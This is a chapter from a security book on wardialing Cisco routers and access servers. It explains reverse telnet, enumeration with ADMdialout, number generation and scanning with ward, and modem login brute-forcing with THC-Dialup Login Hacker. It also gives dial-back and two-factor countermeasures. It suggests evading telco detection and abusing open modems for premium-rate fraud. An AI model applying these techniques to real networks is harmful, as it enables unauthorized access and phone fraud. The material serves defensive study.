CISCO DEVICE WARDIALING

CISCO DEVICE WARDIALING

With the passage of time and the current development of fast Internet access technologies, the security community has started to forget the good old days of breaking into networks through Plain Old Telephone Service (POTS). Although old dial-in systems used for remote access into a company's internal infrastructure are being widely replaced with modern VPN technologies' reduced costs, greater speed, and added flexibility, a great number of organizations are too slow, too bureaucratic, or see no practical need to switch to VPN.

Although wardialing is one of the oldest methods of gaining unauthorized access to the targeted systems, it is one of the dangers most commonly forgotten by network engineers and system administrators especially for those young enough to have never encountered remote dial-in access. However, a single improperly configured machine with a modem connected to a telephone line might make the whole perimeter defense useless.

Rather than launching a frontal assault, a hacker can sneak past all the expensive firewalls and IDS and head straight into the core of the net. Through wardialing, an attacker searches for the devices located in the target network infrastructure that are also accessible through the telephone line. You might argue about the relevance of wardialing to the Cisco devices if you forget that most Cisco hosts can communicate via modem. Before we get to the part of how someone can abuse such a device, you must know about situations when you are likely to find these devices and why such means of access do exist.

Cisco Router Wardialing 101: Interfaces, Configurations, and Reverse Telnet

The three main reasons for attaching a modem to a Cisco router are either remote access to the Cisco device itself, dial-on-demand, or dial backup.

Remote access is often required for a device stationed in a distant location, when physical access to the unit is troublesome or impossible . If something major goes wrong with the device, a remote out-of- band way of connecting to it and fixing the problem is available. Service companies often install designated lines to such equipment on the client site, so that administrators have additional means of accessing it to perform maintenance, upgrades, or otherwise manage the device.

Dial-on-demand is commonly used to establish connectivity on an as-necessary basis, maintain it as long as required, and drop it when it is no longer needed. Dial-on-demand routing (DDR) is commonly found in networks where access to external resources is required on an occasional basis and the volume of the transferred data is low. It could also be a way to provide redundancy and traffic load balancing under a heavy load. Dial backup is most frequently found in networks where redundancy is necessary. Such an option is exercised in situations where a constant link exists between sites, but the dial-up option is kept on standby in case the main link goes down. In case of the fault, the system automatically initiates a dial-up connection so that the connectivity remains uninterrupted.

For dial-on-demand and dial backup, we are interested in situations when a router is configured not only to initiate the call, but also has an ability to receive and respond to one (the difference in the config file being modem inout and modem callout commands).

One of the distinct features of the Cisco routers allows us to identify devices that listen on the serial interfaces without actually doing any wardialing, thus saving time and money. To understand how this can be achieved, you need to understand how a Cisco router differentiates between its serial lines.

The possible line types are as follows :

  • auxN The router's auxiliary port, commonly used for modem backup connections

  • console The router's console port

  • ttyN The router's asynchronous port used for modem connections

  • vtyN The virtual terminals, the router's Telnet and rlogin connections

To make the matter a bit more complicated, two numbering notations are used: absolute and relative . While in relative line numbering addresses, the first TTY present is tty0, first vty-vty0, and so on, the absolute line numbering is calculated by its location on the system. The following table shows the absolute/relative numbering scheme:

Line

Absolute No.

Relative No.

CTY

TTY1

1

1

TTY2

2

2

TTYn

n

n

AUX

n+1

VTY0

n+2

VTY1

n+3

1

On newer modular Cisco routers, the TTY numbering is different, since the modular extensions have reserved TTYs allocatedfor example, Slot 0 has reserved lines 132, slot 1 has reserved lines 3364, and so on. So the AUX port absolute numbering on the router with two modules slots would be 65.

Let's look at asynchronous ports (TTYs) and the auxiliary port in more details. A TTY port directly corresponds to the asynchronous interface of the router to which the modem is connected. Note that when you configure the TTY port, you configure the hardware aspects of the connectivity between the port and the attached serial device. To configure the overlaying protocol, you need to specify the corresponding asynchronous interface. The typical configuration example of the modem attached to TTY interface 2 set for dial-in is shown here:

 line tty 2       login local        modem dialin        modem autoconfigure discovery        speed 115200        flowcontrol hardware 

The AUX port is typically configured as the asynchronous serial interface on routers without built-in asynchronous interfaces or as a backup asynchronous port. It is also possible to configure it as a backup console port, but more often it is used for remote dial-in purposes. As compared to the normal asynchronous line, its performance is much slower and it misses some essential functions supporting up to 38400 Kbps (on older hardware) but would an attacker really moan and complain if he or she can get in this way?

A sample configuration of the AUX backup link looks like this:

 chat-script arh0nt ABORT ERROR ABORT BUSY "" "AT" OK "ATDT \T" TIMEOUT 45       CONNECT \c      !      dialer-list 1 protocol ip permit      !      interface Serial0/0        ip address 192.168.30.202 255.255.255.0        encapsulation ppp        backup delay 10 1        backup interface Async65        no ip mroute-cache       !       interface Async65        ip address 192.168.30.222 255.255.255.0        dialer in-band        dialer string 123456789        dialer-group 1        async dynamic routing       !       line aux 0        script dialer arh0nt        modem InOut 

Once you are set up in testing conditions, try Telneting to the IP address of the serial 0/0 interface to port 2001. You'll see a prompt. By Telneting to one of the upper ports, the router redirects the request back out of a selected asynchronous line, the so-called reverse telnet connection process in Ciscospeak. By connecting to the port 2001, the router executes the login procedure and connects the session to a mapped line. The mapping of the ports is rather straightforward: subtract 2000 from the Telnet port to get the number of the TTY to which you are connected. The same rules apply to the numbering of the AUX port, but on the router with absent TTY ports, the AUX interface would always map to port 2001. Additionally, you might want to check 400(TTYn) and 600(TTYn). The former is usually used for sending data directly to a printer, while the latter is the same as port 200(TTYn), except that it turns off the carriage -return translation.

The enumeration of such devices is easily achieved with the use of the excellent tool ADMcisco from the ADM crew ( http://www.adm.freelsd.net/ADM/ ):

 #arhontus / # ./ADMdialout      ADMdialout by plaguez - reading from stdin      192.168.66.202      FOUND DIALUP host: 192.168.66.202 port: 2001 ! 

This tool tries to open a connection to the host sequentially on the port in the range between 2001 and 2011, and it sends the Hayes-compatible .I command if it gets an OK response; such a host is considered vulnerable, thus not requiring authentication to use the serial device connected to it. What a great opportunity to use a modem remotely! You can even write a small shell script that will connect to the host and dial out to wardial in a foreign country without having to pay a huge phone bill. (Speaking of phone bills, you have most certainly come across some premium phone numbers where you are charged ridiculous amounts per minute. You get the idea of how a malicious hacker can make a bit of cash.)

Discovering the Numbers to Dial In

Attack 

Popularity:

2

Simplicity:

9

Impact:

2

Risk Rating:

4

Moving back in time, let's pay more attention to "real" wardialing and the available software. Hacking networks through wardialing has been covered in great detail in other editions of Hacking Exposed . Although this book is about hacking Cisco networks, we will cover wardialing software available for Linux, introducing our readers to the tools suitable to do the job on the most famous Unix clone.

Although they have no fancy GUIs or huge databases of fingerprints of the responding devices or any other colorful options you might find in the commercial products, these tools are written with one purpose in mind: effectiveness.

One of the best and quickest wardialing scanners available is ward, a tool currently being developed and maintained by Marco Ivaldi. You can visit its homepage at http://www.0xdeadbeef. info ; the latest version at the time of writing is v2.3, released on January 22, 2005.

Once you download the source code, you'll need to compile it by executing the following command:

 arh0ntus ward # gcc -lm ward.c -o ward23 

The tool should compile flawlessly. (If you get any error messages, write to raptor@0xdeadbeef.info for suggestions.)

 arh0ntus ward #./ward23 -h      ward.c v2.3 - Fast wardialer for UNIX systems (PSTN/ISDN/GSM)      Copyright (c) 2001-2005 Marco Ivaldi <raptor@0xdeadbeef.info>      usage:              ./ward23 [ [-g file] [-n nummask] ] [-r]   (generation mode)              ./ward23 [-s file] [-t timeout] [-d dev]   (scanning mode)      generation mode:              -g  generate numbers list and save it to file              -n  number mask to be used in generation mode              -r  toggle random mode ON      scanning mode:              -s  scan a list of phone numbers from file              -t  set the modem timeout (default=60secs)              -d  use this device (default=/dev/modem)      help:              -h  print this help 

The tool presents you with two modes of operation. In a generation mode, you can create a list of numbers that you want to check and feed back into ward later in scan mode. Note that when you generate the number list, it is advisable to specify the -r option to randomize the order of the phone numbers in the list, so that you are less likely to be identified by telcos as conducting wardialing from your landline .

Caution 

Before executing any wardialing, be familiar with the attitude of your phone company toward such activities.

By executing the following command, you will generate the phone number list of 12,000 11-digit numbers that start with 0313371 :

 arh0ntus ward #./ward23 -g hecisco-pn.txt -n 0313371xxxx -r 

You can feed the list into ward for immediate wardialing or split it into several parts to be dialed on different machines or by different instances of ward, providing you have several modems connected.

Once satisfied with the layout of the number file, feed it into ward, setting the delay of the total time ward will spend on each phone number and specifying the device to which a modem is connected:

 arh0ntus ward #./ward23 -s hecisco-pn.txt -t 30 -d /dev/ttyS0 

You can relax now and continue with other tasks , since wardialing is a rather timely process, especially if you have a large list of numbers to go through.

All the activities of ward are written into the file with phone numbers, so as ward continues its work, you can monitor the progress by looking for changes in the phone number files, which will have a format similar to this:

 03133712679            -      03133713370            CONNECT      03133714050            -      03133712287            UNSCANNED 03133715449 UNSCANNED 

The number files reflect the progress of the current session, so that numbers that haven't been scanned yet will be marked as UNSCANNED ; therefore, ward can safely be stopped and the session can be restored another time.

Ward does not make any distinction as to whether or not the prompt presented is a Cisco device, so you will have to search through the numbers that have the CONNECT response to check for device type. The current version of the tool is also incapable of differentiating between data or fax response.

Getting into a Cisco Router or an Access Server

Attack 

Popularity:

2

Simplicity:

19

Impact:

10

Risk Rating:

7

Identifying a device that gives you a prompt doesn't mean much. You can't be sure that this device is in fact the one you are looking for or that it even belongs to the network that you are determined to break into. As with every proper pentest, root is what really counts, so you have to gain access to this device. For the most part, the only option available to you if you come across a Cisco device is the boring old bruteforcing option. But this is what this chapter is really about. We have described the Telnet bruteforcing earlier on and nearly the same rules apply to the dial-in devices bruteforcing, although the tools useful for this job are different and the whole process is painfully slow. So cut your standard usernames/passwords list in half and go on downloading THC-Dialup Login Hacker.

THC-Dialup Login Hacker is one of the few tools that is able to dial a specific number and try different combinations of username/passwords against modem carriers . The tool has been developed by Van Hauser from The Hacker's Choice (THC), and the latest version1.1 as of this writing, released on June 25, 2003can be downloaded from http://www.thc.org/download.php?t=r&f=login_hacker-1.1.tar.gz . In fact, it is a collection of different minicom scripts that are called and controlled from the main bash scripts, so in order to run it, minicom and bash must be installedstandard with every Linux distribution. In fact, the tool comes in two parts: the login_hacker part is responsible for checking the presence of the login prompt, while ppp_check is used to verify the presence of passwordless Point-to-Point Protocol (PPP) dial-ins on the other end.

Let's have a look at which options are available:

 arh0ntus login_hacker-1.1 # ./login_hacker      Modem Login Hacker v1.1 (c) 2003 by van Hauser / THC <vh@thc.org>      Syntax:        ./login_hacker PHONENUMBER type1 COLONFILE        ./login_hacker PHONENUMBER type2 LOGINFILE PASSWORDFILE        ./login_hacker PHONENUMBER type3 PASSWORDFILE        ./login_hacker PHONENUMBER your_own_script INPUTFILE [INPUTFILE]      Options:        PHONENUMBER    number to call and try to break in        LOGINFILE      input file with logins to try        PASSWORDFILE   input file with passwords to try        COLONFILE      input file with LOGIN:PASSWORD entries      Types:        type1+type2    should work against any login/password type modem prompts        type3          should work against any password type modem prompts      This script is really flexible, it works against Unix, Cisco, Shiva, ROLM      PABX, Modem dialin password protection, and many, many more.      Take a look in the README. Use allowed only for legal purposes!      You can always find the newest version at http://www.thc.org 

What catches your eye straightaway is the different modem prompt types. Type1 and type2 are used against exactly the same modem promptsthe only difference being that with the former you have to use a colon -separated login and password list while with the latter they are supplied in two different files, so that for every login all passwords from the list will be tried. The type1 script works against the modem prompts where authentication into the system is granted upon successful presentation of the correct login and password pair and supports the following modem prompts:

 Login: asdf                Enter login name: asdf     Login: bin      Password:                  Enter login name: qwert    Welcome to system abc.      Login incorrect.           Enter login name: admin    Last login: never      Login:                     password:                  $      Username: asdf             @login: root      Password:                  password:      % Authentication failed    password:      Username:                  password: 

The dual authentication logins are found on the Cisco routers where aaa new-model authentication is enabled. On the contrary, the type3 scripts are used against standard password-only authentication and are able to recognize the following prompts:

 Password:                          Enter password:      Password:                          Enter password:      Password:                          Enter password:      % Bad passwords      PASSWORD> ####                  Password please: *****      PASSWORD> ###                   Password please: *****      PASSWORD> #######               Password please: *****                                         Invalid passwords, bye! 

Among the two authentication schemes, the tool covers the whole range of IOS routers, AccessPoints, CatOS switches, and PixOS firewalls. You can easily expand the abilities of the recognized prompts by modifying the typeN.scr script file and adding more signatures.

The only other things you need to specify are the phone number of the host you are attacking and the login/password files with your favorite pairs. Once you specify this information, the minicom window will appear and the bruteforcing process starts. The progress is shown in real-time in the minicom window and saved to the logfile in the directory from which the tool was run.

The second part of the login hacker suite is used to check for the passwordless dialins that use PPP. The only thing you need to supply to the script is the phone number that you want to check, and in case your default modem is not /dev/modem , you would have to fire up VIM and change the path to the serial device you want to use (for example, /dev/ttyS0 means the device is connected to the first serial port on your computer). Once you are done, THC-Dialup Login Hacker will dial the number and initiate the connection to a host. Upon the successful negotiation, you will see the PPP dial-up procedure, and if the PPP dial-in requires authentication, the following output would appear:

 Serial connection established.      using channel 2      Using interface ppp0      Connect: ppp0 <--> /dev/ttyS0      rcvd [LCP ConfReq id=0x1 <mru 1500> <asyncmap 0xa0000> <auth pap>       <magic 0xa28e4641> <pcomp> <accomp> <mrru 1506>]      sent [LCP ConfReq id=0x1 <asyncmap 0x0> <magic 0xada708b9> <pcomp> <accomp>]  No auth is possible  

Countermeasures for Wardialing Security

Countermeasure 

You can appeal to both common sense and the previous editions of Hacking Exposed: Network Security Secrets & Solutions for more general recommendations on how to protect yourself from those phreaky wardialers. We already covered possible security measures against user credentials guessing when talking about Telnet and other services' bruteforcing.

Specifically with Cisco wardialing, we can offer two useful tips.

Use dial-back authentication when the remote party hangs up the incoming connection and dials out a predetermined telephone number. Unless the device is used to allow remote connections into the network by a large crowd of road- warrior users, this solution can be considered feasible when both communicating parties' locations are known. Here's an example of a dial-back router configuration:

 username <username> callback-dialstring <number> password <password>      username <username> callback-dialstring "" password <password>      !      !      chat-script <script name> ABORT ERROR ABORT BUSY """ATZ" OK "ATDT \T"       TIMEOUT 30 CONNECT \c      !      interface Loopback0      ip address <IP> <netmask>      no ip directed-broadcast      !      interface Serial1/1      no shutdown      physical-layer async      ip unnumbered Loopback0      no ip directed-broadcast      encapsulation ppp      dialer in-band      dialer hold-queue 2 timeout 30      async mode interactive      peer default ip address pool <pool name>      no cdp enable      ppp callback accept      ppp authentication chap      !      ip local pool <pool name> <IP addresses>      !      line <line number>      autoselect during-login      autoselect ppp      script callback <script name>      login local      modem InOut      modem autoconfigure type usr_sportster      transport input all      callback forced-wait 30      stopbits 1      speed 115200      flowcontrol hardware 

Two factor authentication mechanisms, such as hardware tokens or smartcards, can be considered practical, especially if you are managing a large pool of remotely connecting users. This can be done using both secureID server and TACACS+/RADIUS. Such a mechanism relies on users possessing two authentication credentialssomething the user has (a token) and something the user knows (a password)and is viewed as difficult to bypass.



Hacking Exposed Cisco Networks
Hacking Exposed Cisco Networks: Cisco Security Secrets & Solutions
ISBN: 0072259175
EAN: 2147483647
Year: 2005
Pages: 117

Similar book on Amazon

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net